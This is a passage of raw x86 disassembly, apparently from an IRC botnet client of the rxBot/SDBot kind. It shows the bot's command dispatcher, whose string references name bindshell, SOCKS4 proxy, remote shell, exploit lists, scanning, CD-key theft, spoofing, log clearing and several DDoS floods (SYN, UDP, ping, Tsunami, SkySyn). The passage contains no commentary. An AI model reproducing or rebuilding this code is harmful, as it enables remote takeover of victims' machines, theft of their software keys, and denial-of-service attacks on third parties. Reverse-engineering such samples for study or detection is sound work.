push offset aS ; "%s"
push eax
call sub_41E6A6
push [ebp+esi+4Ch+var_94]
call sub_41E7AD
mov [ebp+4Ch+var_2918], eax
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_2AB8], eax
push 7Fh
lea eax, [ebp+4Ch+var_D0]
push eax
lea eax, [ebp+4Ch+var_2998]
push eax
call sub_41E860
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_2910], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_290C], eax
lea eax, [ebp+4Ch+var_D0]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42FAC0
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 1Bh
push eax
call sub_40AE85
add esp, 34h
mov [ebp+4Ch+var_2914], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_2AB8]
push eax
push offset byte_418799
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_2914]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4030BD
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42FA88
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_4030B5: ; CODE XREF: sub_40274D+976�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4030BD: ; CODE XREF: sub_40274D+955�j
cmp [ebp+4Ch+var_2908], ebx
jz short loc_4030B5
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_4030CA: ; CODE XREF: sub_40274D+89E�j
lea eax, [ebp+4Ch+var_D0]
push eax
push offset unk_42FA58
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_4030DB: ; CODE XREF: sub_40274D+88E�j
lea eax, [ebp+4Ch+var_D0]
push eax
push offset unk_42FA24
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_4030EC: ; CODE XREF: sub_40274D+62E�j
mov eax, [ebp+4Ch+var_10]
lea ecx, [eax+1]
mov al, [eax]
cmp al, ds:byte_43C08C
mov [edi], ecx
jnz loc_402B92
loc_403102: ; CODE XREF: sub_40274D+885�j
mov edi, [edi]
push edi
push offset aLogin ; "login"
mov [ebp+4Ch+var_10], edi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40A0B6
push edi
push offset asc_42FA20 ; "l"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40A0B6
cmp [ebp+4Ch+var_14], ebx
jnz short loc_40314D
push [ebp+4Ch+var_A0]
push offset dword_42FBF4
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_404979
loc_40314D: ; CODE XREF: sub_40274D+9E7�j
cmp [ebp+4Ch+arg_28], ebx
jnz loc_404979
xor edi, edi
cmp ds:dword_43C4A0, ebx
jle loc_4032D6
mov [ebp+4Ch+var_14], offset dword_4D1450
loc_40316B: ; CODE XREF: sub_40274D+A3D�j
push [ebp+4Ch+var_10]
push [ebp+4Ch+var_14]
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_403191
add [ebp+4Ch+var_14], 0B8h
inc edi
cmp edi, ds:dword_43C4A0
jl short loc_40316B
jmp loc_4032D6
; ---------------------------------------------------------------------------
loc_403191: ; CODE XREF: sub_40274D+A2D�j
push offset asc_42FCE4 ; " :"
push [ebp+4Ch+arg_0]
call sub_41F090
cmp eax, ebx
pop ecx
pop ecx
jz loc_402B92
mov cl, ds:byte_43C08C
imul edi, 0B8h
mov [eax+2], cl
mov cl, ds:byte_43C08C
mov [eax+3], cl
push 9Fh
lea ecx, dword_4D1468[edi]
push ecx
add eax, 4
push eax
call sub_41E860
lea eax, dword_4D1450[edi]
add esp, 0Ch
mov [ebp+4Ch+var_14], 0Fh
mov [ebp+4Ch+var_24], eax
lea edi, [ebp+esi+4Ch+var_64]
loc_4031EC: ; CODE XREF: sub_40274D+B2A�j
push [ebp+4Ch+var_14]
lea eax, [ebp+4Ch+var_B4]
push offset aD ; "$%d-"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_B4]
push eax
push [ebp+4Ch+arg_0]
call sub_41F090
add esp, 14h
test eax, eax
jz short loc_403245
cmp [edi], ebx
jz short loc_403249
push [ebp+4Ch+var_24]
call sub_41E1C0
add [ebp+4Ch+var_18], eax
pop ecx
jz short loc_40326E
push dword ptr [edi-4]
push [ebp+4Ch+var_18]
call sub_41F090
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40326E
push eax
lea eax, [ebp+4Ch+var_B4]
push eax
push [ebp+4Ch+arg_0]
call sub_41AB7D
add esp, 0Ch
jmp short loc_40326E
; ---------------------------------------------------------------------------
loc_403245: ; CODE XREF: sub_40274D+AC1�j
cmp [edi], ebx
jnz short loc_40326E
loc_403249: ; CODE XREF: sub_40274D+AC5�j
push 2
lea eax, [ebp+4Ch+var_B4]
push eax
lea eax, [ebp+4Ch+var_A8]
push eax
call sub_41E860
lea eax, [ebp+4Ch+var_A8]
push eax
lea eax, [ebp+4Ch+var_B4]
push eax
push [ebp+4Ch+arg_0]
mov [ebp+4Ch+var_A6], bl
call sub_41AB7D
add esp, 18h
loc_40326E: ; CODE XREF: sub_40274D+AD3�j
; sub_40274D+AE4�j ...
dec [ebp+4Ch+var_14]
sub edi, 4
cmp [ebp+4Ch+var_14], ebx
jg loc_4031EC
lea eax, [ebp+esi+4Ch+var_64]
mov [ebp+4Ch+var_14], 10h
mov edi, eax
loc_40328A: ; CODE XREF: sub_40274D+B80�j
push [ebp+4Ch+var_14]
lea eax, [ebp+4Ch+var_B4]
push offset aD_1 ; "$%d"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_B4]
push eax
push [ebp+4Ch+arg_0]
call sub_41F090
add esp, 14h
test eax, eax
jz short loc_4032C4
mov eax, [edi]
cmp eax, ebx
jz short loc_4032C4
push eax
lea eax, [ebp+4Ch+var_B4]
push eax
push [ebp+4Ch+arg_0]
call sub_41AB7D
add esp, 0Ch
loc_4032C4: ; CODE XREF: sub_40274D+B5F�j
; sub_40274D+B65�j
dec [ebp+4Ch+var_14]
sub edi, 4
cmp [ebp+4Ch+var_14], ebx
jg short loc_40328A
mov [ebp+4Ch+var_8], 1
loc_4032D6: ; CODE XREF: sub_40274D+A11�j
; sub_40274D+A3F�j
mov eax, [ebp+4Ch+var_10]
mov al, [eax]
cmp al, ds:byte_43C08C
jz short loc_4032EC
cmp [ebp+4Ch+var_8], ebx
jz loc_40349C
loc_4032EC: ; CODE XREF: sub_40274D+B94�j
push [ebp+4Ch+arg_10]
mov edi, [ebp+4Ch+arg_0]
push offset aMe ; "$me"
push edi
call sub_41AB7D
lea eax, [ebp+4Ch+var_D0]
push eax
push offset aUser ; "$user"
push edi
call sub_41AB7D
push [ebp+4Ch+var_9C]
push offset aChan ; "$chan"
push edi
call sub_41AB7D
push ebx
push ebx
lea eax, [ebp+4Ch+var_B4]
push 2
push eax
call sub_40AB83
push eax
push offset aRndnick ; "$rndnick"
push edi
call sub_41AB7D
add esp, 40h
push [ebp+4Ch+arg_14]
push offset aServer ; "$server"
push edi
call sub_41AB7D
mov edi, offset aChr ; "$chr("
push edi
push [ebp+4Ch+arg_0]
call sub_41F090
add esp, 14h
jmp loc_403420
; ---------------------------------------------------------------------------
loc_40335D: ; CODE XREF: sub_40274D+CD5�j
push edi
push [ebp+4Ch+arg_0]
call sub_41F090
mov [ebp+4Ch+var_24], eax
add eax, 5
push 4
push eax
lea eax, [ebp+4Ch+var_B4]
push eax
call sub_41E860
lea eax, [ebp+4Ch+var_B4]
push offset asc_42F9E0 ; ")"
push eax
call sub_41E7B2
add esp, 1Ch
cmp [ebp+4Ch+var_B4], 30h
jl short loc_403395
cmp [ebp+4Ch+var_B4], 39h
jle short loc_4033A8
loc_403395: ; CODE XREF: sub_40274D+C40�j
push 3
lea eax, [ebp+4Ch+var_B4]
push offset a63 ; "63"
push eax
call sub_41E860
add esp, 0Ch
loc_4033A8: ; CODE XREF: sub_40274D+C46�j
lea eax, [ebp+4Ch+var_B4]
push eax
call sub_41E7AD
test eax, eax
pop ecx
jle short loc_4033C5
lea eax, [ebp+4Ch+var_B4]
push eax
call sub_41E7AD
pop ecx
mov [ebp+4Ch+var_A8], al
jmp short loc_4033D6
; ---------------------------------------------------------------------------
loc_4033C5: ; CODE XREF: sub_40274D+C67�j
call sub_41ECDE
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+4Ch+var_A8], dl
loc_4033D6: ; CODE XREF: sub_40274D+C76�j
lea eax, [ebp+4Ch+var_B4]
push eax
mov [ebp+4Ch+var_A7], bl
call sub_41E1C0
push 0Ch
mov [ebp+4Ch+var_14], eax
lea eax, [ebp+4Ch+var_B4]
push ebx
push eax
call sub_41E5F0
mov eax, [ebp+4Ch+var_14]
add eax, 6
push eax
push [ebp+4Ch+var_24]
lea eax, [ebp+4Ch+var_B4]
push eax
call sub_41E860
lea eax, [ebp+4Ch+var_A8]
push eax
lea eax, [ebp+4Ch+var_B4]
push eax
push [ebp+4Ch+arg_0]
call sub_41AB7D
push edi
push [ebp+4Ch+arg_0]
call sub_41F090
add esp, 30h
loc_403420: ; CODE XREF: sub_40274D+C0B�j
test eax, eax
jnz loc_40335D
mov edi, 1FFh
push edi
push [ebp+4Ch+arg_0]
lea eax, [ebp+4Ch+var_4590]
push eax
call sub_41E860
push edi
lea eax, [ebp+4Ch+var_4590]
push eax
lea eax, [ebp+4Ch+var_4AF8]
push eax
call sub_41E860
mov edi, offset asc_42FCE0 ; " "
lea eax, [ebp+4Ch+var_4AF8]
push edi
push eax
call sub_41E7B2
add esp, 20h
mov [ebp+4Ch+var_A4], eax
mov [ebp+4Ch+var_24], 1
loc_403470: ; CODE XREF: sub_40274D+D3A�j
push edi
push ebx
call sub_41E7B2
pop ecx
pop ecx
mov ecx, [ebp+4Ch+var_24]
inc [ebp+4Ch+var_24]
cmp [ebp+4Ch+var_24], 20h
mov [ebp+ecx*4+4Ch+var_A4], eax
jl short loc_403470
lea eax, [ebp+esi+4Ch+var_A4]
mov ecx, [eax]
cmp ecx, ebx
jz loc_402B92
add ecx, 3
mov [eax], ecx
loc_40349C: ; CODE XREF: sub_40274D+B99�j
mov edi, [ebp+esi+4Ch+var_A4]
push edi
push offset aRndnick_0 ; "rndnick"
mov [ebp+4Ch+var_10], edi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40A067
push edi
push offset aRn ; "rn"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40A067
push edi
push offset aDie ; "die"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405446
push edi
push offset aD_0 ; "d"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405446
push edi
push offset aLogout ; "logout"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4053AE
push edi
push offset aLo ; "lo"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4053AE
push edi
push offset aVersion ; "version"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40539F
push edi
push offset aVer ; "ver"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40539F
push edi
push offset aDedication ; "dedication"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405395
push edi
push offset aDed ; "ded"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405395
push edi
push offset aSpeedtest ; "speedtest"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405382
push edi
push offset aSt ; "st"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405382
push edi
push offset aSecure ; "secure"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405288
push edi
push offset aSec ; "sec"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405288
push edi
push offset aUnsecure ; "unsecure"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405288
push edi
push offset aUnsec ; "unsec"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405288
push edi
push offset aBindshell ; "bindshell"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40518C
push edi
push offset aBd ; "bd"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40518C
push edi
push offset aBindshellstop ; "bindshellstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403643
push [ebp+esi+4Ch+var_A0]
push 6
push offset aServer_0 ; "Server"
push offset dword_42F934
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403643: ; CODE XREF: sub_40274D+EDF�j
push edi
push offset aSocks4 ; "socks4"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405074
push edi
push offset aS4 ; "s4"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405074
push edi
push offset aSocks4stop ; "socks4stop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403693
push [ebp+esi+4Ch+var_A0]
push 19h
push offset aServer_0 ; "Server"
push offset dword_42F90C
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403693: ; CODE XREF: sub_40274D+F2F�j
push edi
push offset aRloginstop ; "rloginstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4036B9
push [ebp+esi+4Ch+var_A0]
push 9
push offset aServer_0 ; "Server"
push offset dword_42F8F0
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4036B9: ; CODE XREF: sub_40274D+F55�j
push edi
push offset aHttpstop ; "httpstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4036DF
push [ebp+esi+4Ch+var_A0]
push 3
push offset aServer_0 ; "Server"
push offset dword_42F8D4
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4036DF: ; CODE XREF: sub_40274D+F7B�j
push edi
push offset aLogstop ; "logstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403705
push [ebp+esi+4Ch+var_A0]
push 25h
push offset aLogList ; "Log list"
push offset dword_42F8B4
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403705: ; CODE XREF: sub_40274D+FA1�j
push edi
push offset aRedirectstop ; "redirectstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_40372B
push [ebp+esi+4Ch+var_A0]
push 18h
push offset aTcpRedirect ; "TCP redirect"
push offset dword_42F884
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_40372B: ; CODE XREF: sub_40274D+FC7�j
push edi
push offset aDdos_stop ; "ddos.stop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403751
push [ebp+esi+4Ch+var_A0]
push 0Dh
push offset aDdosFlood ; "DDoS flood"
push offset dword_42F860
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403751: ; CODE XREF: sub_40274D+FED�j
push edi
push offset aSynstop ; "synstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403777
push [ebp+esi+4Ch+var_A0]
push 0Eh
push offset aSynFlood ; "Syn flood"
push offset dword_42F840
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403777: ; CODE XREF: sub_40274D+1013�j
push edi
push offset aSkysynstop ; "skysynstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_40379D
push [ebp+esi+4Ch+var_A0]
push 10h
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_42F814
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_40379D: ; CODE XREF: sub_40274D+1039�j
push edi
push offset aTarga3stop ; "targa3stop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4037C3
push [ebp+esi+4Ch+var_A0]
push 11h
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_42F7E8
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4037C3: ; CODE XREF: sub_40274D+105F�j
push edi
push offset aWonkstop ; "wonkstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4037E9
push [ebp+esi+4Ch+var_A0]
push 12h
push offset aWonkFlood ; "Wonk flood"
push offset dword_42F7C4
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4037E9: ; CODE XREF: sub_40274D+1085�j
push edi
push offset aPacketstop ; "packetstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_40391E
mov esi, [ebp+esi+4Ch+var_A0]
mov edi, [ebp+4Ch+arg_4]
push esi
push 0Dh
push offset aDdosFlood ; "DDoS flood"
push offset dword_42F860
push 1
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push edi
call sub_40B0BB
push esi
push 0Eh
push offset aSynFlood ; "Syn flood"
push offset dword_42F840
push 1
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push edi
call sub_40B0BB
add esp, 40h
push esi
push 17h
push offset aUdpFlood ; "UDP flood"
push offset dword_42F7A0
push 1
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push edi
call sub_40B0BB
push esi
push 16h
push offset aPingFlood ; "Ping flood"
push offset dword_42F788
push 1
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push edi
call sub_40B0BB
add esp, 40h
push esi
push 11h
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_42F7E8
push 1
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push edi
call sub_40B0BB
push esi
push 12h
push offset aWonkFlood ; "Wonk flood"
push offset dword_42F7C4
push 1
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push edi
call sub_40B0BB
add esp, 40h
push esi
push 0Fh
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_42F768
push 1
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push edi
call sub_40B0BB
push esi
push 13h
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_42F748
push 1
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push edi
call sub_40B0BB
add esp, 40h
push esi
push 10h
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_42F814
push 1
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push edi
call sub_40B0BB
push ebx
push [ebp+4Ch+var_4]
push offset unk_42F714
push [ebp+4Ch+var_9C]
push edi
call sub_40123B
add esp, 34h
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_40391E: ; CODE XREF: sub_40274D+10AB�j
push edi
push offset aTsunamistop ; "tsunamistop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403944
push [ebp+esi+4Ch+var_A0]
push 0Fh
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_42F768
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403944: ; CODE XREF: sub_40274D+11E0�j
push edi
push offset aWisdomstop ; "wisdomstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_40396A
push [ebp+esi+4Ch+var_A0]
push 13h
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_42F748
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_40396A: ; CODE XREF: sub_40274D+1206�j
push edi
push offset aUdpstop ; "udpstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403990
push [ebp+esi+4Ch+var_A0]
push 17h
push offset aUdpFlood ; "UDP flood"
push offset dword_42F7A0
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403990: ; CODE XREF: sub_40274D+122C�j
push edi
push offset aPingstop ; "pingstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4039B6
push [ebp+esi+4Ch+var_A0]
push 16h
push offset aPingFlood ; "Ping flood"
push offset dword_42F788
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4039B6: ; CODE XREF: sub_40274D+1252�j
push edi
push offset aTftpstop ; "tftpstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4039DC
push [ebp+esi+4Ch+var_A0]
push 5
push offset aServer_0 ; "Server"
push offset dword_42F6CC
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4039DC: ; CODE XREF: sub_40274D+1278�j
push edi
push offset aFindfilestop ; "findfilestop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40504B
push edi
push offset aFfstop ; "ffstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40504B
push edi
push offset aProcsstop ; "procsstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405039
push edi
push offset aPsstop ; "psstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405039
push edi
push offset aClonestop ; "clonestop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403A56
push [ebp+esi+4Ch+var_A0]
push 1Fh
push offset aClone ; "Clone"
push offset dword_42F67C
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403A56: ; CODE XREF: sub_40274D+12F2�j
push edi
push offset aSecurestop ; "securestop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403A7C
push [ebp+esi+4Ch+var_A0]
push 22h
push offset aSecure_0 ; "Secure"
push offset dword_42F658
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403A7C: ; CODE XREF: sub_40274D+1318�j
push edi
push offset aScanstop ; "scanstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403AA2
push [ebp+esi+4Ch+var_A0]
push 0Bh
push offset aScan ; "Scan"
push offset dword_42F638
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403AA2: ; CODE XREF: sub_40274D+133E�j
push edi
push offset aScanstats ; "scanstats"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405026
push edi
push offset aStats ; "stats"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405026
push edi
push offset aTransferstats ; "transferstats"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405013
push edi
push offset aTrstats ; "trstats"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405013
push edi
push offset aConnectbacksta ; "connectbackstats"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405000
push edi
push offset aCbstats ; "cbstats"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_405000
push edi
push offset aExploitlist ; "exploitlist"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404FED
push edi
push offset aExplist ; "explist"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404FED
push edi
push offset aReconnect ; "reconnect"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404FCC
push edi
push offset aR ; "r"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404FCC
push edi
push offset aDisconnect ; "disconnect"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404FAA
push edi
push offset aDc ; "dc"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404FAA
push edi
push offset aQuit_0 ; "quit"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404F64
push edi
push offset aQ ; "q"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404F64
push edi
push offset aStatus ; "status"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404F29
push edi
push offset aS_5 ; "s"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404F29
push edi
push offset aId ; "id"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404EF5
push edi
push offset aI ; "i"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404EF5
push edi
push offset aReboot ; "reboot"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403C6B
call sub_41AEBB
test eax, eax
mov eax, offset unk_42F574
jnz short loc_403C40
mov eax, offset unk_42F54C
loc_403C40: ; CODE XREF: sub_40274D+14EC�j
push eax
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 1Ch
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_403C6B: ; CODE XREF: sub_40274D+14DE�j
push edi
push offset aThreads ; "threads"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404E1D
push edi
push offset aT ; "t"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404E1D
push edi
push offset aAliases ; "aliases"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404E00
push edi
push offset aAl ; "al"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404E00
push edi
push offset aLog ; "log"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404D17
push edi
push offset aLg ; "lg"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404D17
push edi
push offset aClearlog ; "clearlog"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404CFE
push edi
push offset aClg ; "clg"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404CFE
push edi
push offset aNetinfo ; "netinfo"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404CCF
push edi
push offset aNi ; "ni"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404CCF
push edi
push offset aSysinfo ; "sysinfo"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404CA4
push edi
push offset aSi ; "si"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404CA4
push edi
push offset aRemove ; "remove"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404C6F
push edi
push offset aRm ; "rm"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404C6F
push edi
push offset aProcs ; "procs"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404B59
push edi
push offset aPs ; "ps"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404B59
push edi
push offset aGetcdkeys ; "getcdkeys"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404B35
push edi
push offset aKey ; "key"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404B35
push edi
push offset aUptime ; "uptime"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404AB7
push edi
push offset aUp ; "up"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404AB7
push edi
push offset aDriveinfo ; "driveinfo"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404AA0
push edi
push offset aDrv ; "drv"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404AA0
push edi
push offset aTestdlls ; "testdlls"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404A8A
push edi
push offset aDll ; "dll"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404A8A
push edi
push offset aOpencmd ; "opencmd"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404A1C
push edi
push offset aOcmd ; "ocmd"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404A1C
push edi
push offset aCmdstop ; "cmdstop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_403EB3
push [ebp+esi+4Ch+var_A0]
push 0Ah
push offset aRemoteShell ; "Remote shell"
push offset dword_42F47C
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403EB3: ; CODE XREF: sub_40274D+174F�j
push edi
push offset dword_42F478
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_403FC1
cmp [ebp+4Ch+var_C], ebx
jnz short loc_403EE4
push ebx
push [ebp+4Ch+var_4]
push offset dword_42F464
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_403EE4: ; CODE XREF: sub_40274D+177E�j
mov eax, [ebp+4Ch+arg_18]
mov [ebp+4Ch+var_24], ebx
mov [ebp+4Ch+var_14], eax
jmp short loc_403EF2
; ---------------------------------------------------------------------------
loc_403EEF: ; CODE XREF: sub_40274D+17EE�j
mov eax, [ebp+4Ch+var_14]
loc_403EF2: ; CODE XREF: sub_40274D+17A0�j
cmp [eax], bl
jz short loc_403EF9
inc eax
jmp short loc_403EFE
; ---------------------------------------------------------------------------
loc_403EF9: ; CODE XREF: sub_40274D+17A7�j
mov eax, offset aEmpty ; "<Empty>"
loc_403EFE: ; CODE XREF: sub_40274D+17AA�j
push eax
push [ebp+4Ch+var_24]
lea eax, [ebp+4Ch+var_2D0]
push offset aD_S ; "%d. %s"
push eax
call sub_41E6A6
push 1
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add [ebp+4Ch+var_14], 80h
add esp, 24h
inc [ebp+4Ch+var_24]
cmp [ebp+4Ch+var_24], 3
jl short loc_403EEF
push offset unk_42F430
call sub_417D70
pop ecx
loc_403F48: ; CODE XREF: sub_40274D+1A74�j
; sub_40274D+2D0A�j
mov eax, [ebp+esi+4Ch+var_A0]
cmp eax, ebx
mov [ebp+4Ch+var_8], eax
jz loc_402B92
push edi
push offset aSpoof ; "spoof"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_405563
mov esi, [ebp+4Ch+var_8]
push offset aOff ; "off"
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_405469
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42F3FC
push eax
mov ds:dword_4D5898, ebx
call sub_41E6A6
pop ecx
pop ecx
loc_403F9D: ; CODE XREF: sub_40274D+2DBD�j
; sub_40274D+2DE3�j ...
cmp [ebp+4Ch+var_C], ebx
jnz loc_404979
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
